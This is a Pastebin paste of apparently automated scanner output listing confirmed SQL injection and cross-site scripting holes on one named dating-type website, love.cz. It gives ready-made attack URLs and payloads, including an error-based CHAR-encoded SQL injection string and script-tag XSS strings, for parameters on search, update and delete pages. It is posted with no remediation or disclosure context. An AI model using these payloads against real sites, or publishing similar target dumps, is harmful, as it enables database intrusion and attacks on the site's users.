Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [High Possibility] SQL Injection -- http://love.cz
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/folder.php?id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/view.php?id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/folder.php?id=%27&page=2
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/update.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&cat=4
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/delete.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&cat=4
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=%27&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=%27&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=%27&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_region
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=%27&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_znameni
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=%27&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_icq
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=%27&s_vek=3&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_telefon
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/update.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=%27&s_foto=3&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_vek
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=%27&s_www=3&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_foto
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=%27&s_type=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_www
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php?id=1&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_type
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_region
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_type
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/delete.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.love.cz/search.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: s_znameni
- Parameter Type: Post
- Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- ||| XSS - (Cross-site Scripting) * Cross from NetCross :)
- Severity : Important
- Confirmation : Confirmed
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL : http://www.love.cz/folder.php?id='"--></style></script><script>alert(0x000084)</script>
- Attack Pattern: '"--></style></script><script>alert(0x000084)</script>
- Vulnerable URL : http://www.love.cz/folder.php?id='"--></style></script><script>alert(0x000099)</script>&page=2
- Attack Pattern: '"--></style></script><script>alert(0x000099)</script>
- Vulnerable URL : http://www.love.cz/foto.php3?id=16367.jpg'"--></style></script><script>alert(0x0000A9)</script>
- Attack Pattern: 16367.jpg'"--></style></script><script>alert(0x0000A9)</script>
- Vulnerable URL : http://www.love.cz/search.php
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: 5'"--></style></script><script>alert(0x0000AE)</script>
- Vulnerable URL : http://www.love.cz/update.php?id='"--></style></script><script>alert(0x00014D)</script>&cat=4
- Attack Pattern: '"--></style></script><script>alert(0x00014D)</script>
- Vulnerable URL : http://www.love.cz/update.php?id=16672&cat='"--></style></script><script>alert(0x00014E)</script>
- Attack Pattern: '"--></style></script><script>alert(0x00014E)</script>
- Vulnerable URL : http://www.love.cz/delete.php?id='"--></style></script><script>alert(0x000179)</script>&cat=4
- Attack Pattern: '"--></style></script><script>alert(0x000179)</script>
- Vulnerable URL : http://www.love.cz/delete.php?id=16672&cat='"--></style></script><script>alert(0x00018A)</script>
- Attack Pattern: '"--></style></script><script>alert(0x00018A)</script>
- Vulnerable URL : http://www.love.cz/search.php?id='"--></style></script><script>alert(0x0001A3)</script>&page=2&s_region=3&s_znameni=Ronald Smith&s_icq=3&s_telefon=3&s_vek=3&s_foto=3&s_www=3&s_type=3
- Attack Pattern: '"--></style></script><script>alert(0x0001A3)</script>
- Vulnerable URL : http://www.love.cz/update.php
- Parameter Name: cat
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002A4)</script>
- Vulnerable URL : http://www.love.cz/delete.php
- Parameter Name: cat
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002D4)</script>
- Vulnerable URL : http://www.love.cz/delete.php
- Attack Pattern: '"--></style></script><script>alert(0x0002D9)</script>
- * Programming by NetCross Design Studio All rights reserved.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement